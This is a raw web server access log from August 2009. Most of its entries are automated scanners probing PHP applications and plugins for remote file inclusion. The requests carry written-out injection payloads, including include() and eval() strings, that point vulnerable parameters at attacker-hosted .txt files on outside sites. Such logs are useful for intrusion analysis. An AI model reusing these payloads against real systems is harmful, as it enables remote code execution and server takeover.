72.32.69.162 - - [02/Aug/2009:01:32:04 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.activity.org.ua/main//inc/cmss/yes.txt??%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:01:32:17 -0400] "GET /logs/error_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.activity.org.ua/main//inc/cmss/yes.txt??%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:01:32:56 -0400] "GET /logs/error_log.Q109063000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.14.123.202 - - [02/Aug/2009:01:32:56 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:01:32:56 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:01:32:56 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:01:33:01 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.813"
72.32.69.162 - - [02/Aug/2009:01:33:14 -0400] "GET /logs/access_log.Q109063000%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.activity.org.ua/main//inc/cmss/yes.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
86.58.155.104 - - [02/Aug/2009:01:34:09 -0400] "GET /logs/access_log.Q109063000%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
209.59.12.99 - - [02/Aug/2009:01:34:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.58.179.136 - - [02/Aug/2009:01:35:36 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.58.179.136 - - [02/Aug/2009:01:35:36 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.179.136 - - [02/Aug/2009:01:36:18 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.179.136 - - [02/Aug/2009:01:38:08 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.179.136 - - [02/Aug/2009:01:38:42 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.90.19 - - [02/Aug/2009:01:38:52 -0400] "GET /logs/access_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
74.200.90.19 - - [02/Aug/2009:01:38:52 -0400] "GET /logs//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
74.200.90.19 - - [02/Aug/2009:01:38:52 -0400] "GET //banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.200.90.19 - - [02/Aug/2009:01:39:13 -0400] "GET /logs/error_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:01:39:42 -0400] "GET /logs/access_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:01:39:53 -0400] "GET /logs/error_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:01:39:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.73.192.55 - - [02/Aug/2009:01:40:04 -0400] "GET /logs/access_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.64"
80.73.192.55 - - [02/Aug/2009:01:40:04 -0400] "GET //banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 213 "-" "libwww-perl/5.64"
80.73.192.55 - - [02/Aug/2009:01:40:04 -0400] "GET /logs//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 218 "-" "libwww-perl/5.64"
80.73.192.55 - - [02/Aug/2009:01:40:24 -0400] "GET /logs/error_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 239 "-" "libwww-perl/5.64"
72.30.81.182 - - [02/Aug/2009:01:40:24 -0400] "GET /logs/access_log.Q107121800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.2.122 - - [02/Aug/2009:01:40:27 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:01:40:27 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:01:40:27 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:01:40:27 -0400] "GET /logs/access_log.Q109070600%20%20/index.php?pagina=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:01:40:27 -0400] "GET /index.php?pagina=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:01:40:27 -0400] "GET /logs/index.php?pagina=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:01:40:29 -0400] "GET /logs/error_log.Q109060700%20%20/index.php?pagina=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:01:40:30 -0400] "GET /logs/access_log.Q109070400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:01:40:31 -0400] "GET //banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:01:40:31 -0400] "GET /logs/access_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:01:40:32 -0400] "GET /logs//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
195.190.166.41 - - [02/Aug/2009:01:40:34 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:01:40:34 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:01:40:36 -0400] "GET /logs/access_log.Q109063000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:01:40:45 -0400] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:01:40:45 -0400] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:01:40:45 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:01:40:49 -0400] "GET /logs/access_log.Q109070400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:01:40:56 -0400] "GET /logs/error_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.190.166.41 - - [02/Aug/2009:01:40:59 -0400] "GET /logs/error_log.Q109063000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.237.66.229 - - [02/Aug/2009:01:41:10 -0400] "GET /index.php?pagina=http://hongfuqitian.com/id.gif??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.237.66.229 - - [02/Aug/2009:01:41:10 -0400] "GET /logs/index.php?pagina=http://hongfuqitian.com/id.gif??? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.237.66.229 - - [02/Aug/2009:01:41:10 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=http://hongfuqitian.com/id.gif??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.237.66.229 - - [02/Aug/2009:01:41:18 -0400] "GET /logs/error_log.Q109060700/index.php?pagina=http://hongfuqitian.com/id.gif??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.73.17.7 - - [02/Aug/2009:01:43:57 -0400] "GET /logs/access_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
222.73.17.7 - - [02/Aug/2009:01:44:00 -0400] "GET //banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
222.73.17.7 - - [02/Aug/2009:01:44:00 -0400] "GET /logs//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
78.110.50.132 - - [02/Aug/2009:01:44:22 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:22 -0400] "GET /errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:22 -0400] "GET /logs/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:32 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:32 -0400] "GET /errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:32 -0400] "GET /logs/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:41 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
222.73.17.7 - - [02/Aug/2009:01:44:41 -0400] "GET /logs/error_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
78.110.50.132 - - [02/Aug/2009:01:44:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:42 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:44 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:44:54 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
209.59.12.99 - - [02/Aug/2009:01:44:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.110.50.132 - - [02/Aug/2009:01:45:01 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:04 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:04 -0400] "GET //index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:04 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:06 -0400] "GET /errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:06 -0400] "GET /errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:12 -0400] "GET //index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:14 -0400] "GET //index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:20 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:45:20 -0400] "GET /errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:45:24 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:30 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:45:30 -0400] "GET /errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:45:38 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:38 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:47 -0400] "GET //?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:47 -0400] "GET //?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:45:58 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:46:03 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:46:03 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:46:03 -0400] "GET //index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:46:04 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:46:05 -0400] "GET //index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.190.166.41 - - [02/Aug/2009:01:46:10 -0400] "GET /logs/access_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.110.50.132 - - [02/Aug/2009:01:46:40 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.190.166.41 - - [02/Aug/2009:01:46:41 -0400] "GET /logs/error_log.Q109063000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.132 - - [02/Aug/2009:01:46:43 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
65.55.105.231 - - [02/Aug/2009:01:48:15 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.231 - - [02/Aug/2009:01:48:16 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
78.110.50.132 - - [02/Aug/2009:01:48:22 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:48:22 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:48:34 -0400] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:48:34 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:48:34 -0400] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:48:34 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:48:53 -0400] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:48:53 -0400] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:48:53 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:48:53 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:48:53 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:48:53 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:49:13 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
78.110.50.132 - - [02/Aug/2009:01:49:15 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.199.222.19 - - [02/Aug/2009:01:49:33 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:01:49:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.110.50.132 - - [02/Aug/2009:01:50:13 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:50:15 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.814"
123.242.165.138 - - [02/Aug/2009:01:52:16 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
123.242.165.138 - - [02/Aug/2009:01:52:16 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
123.242.165.138 - - [02/Aug/2009:01:52:16 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
123.242.165.138 - - [02/Aug/2009:01:52:19 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
123.242.165.138 - - [02/Aug/2009:01:52:19 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
123.242.165.138 - - [02/Aug/2009:01:52:19 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
123.242.165.138 - - [02/Aug/2009:01:52:29 -0400] "GET /logs/error_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
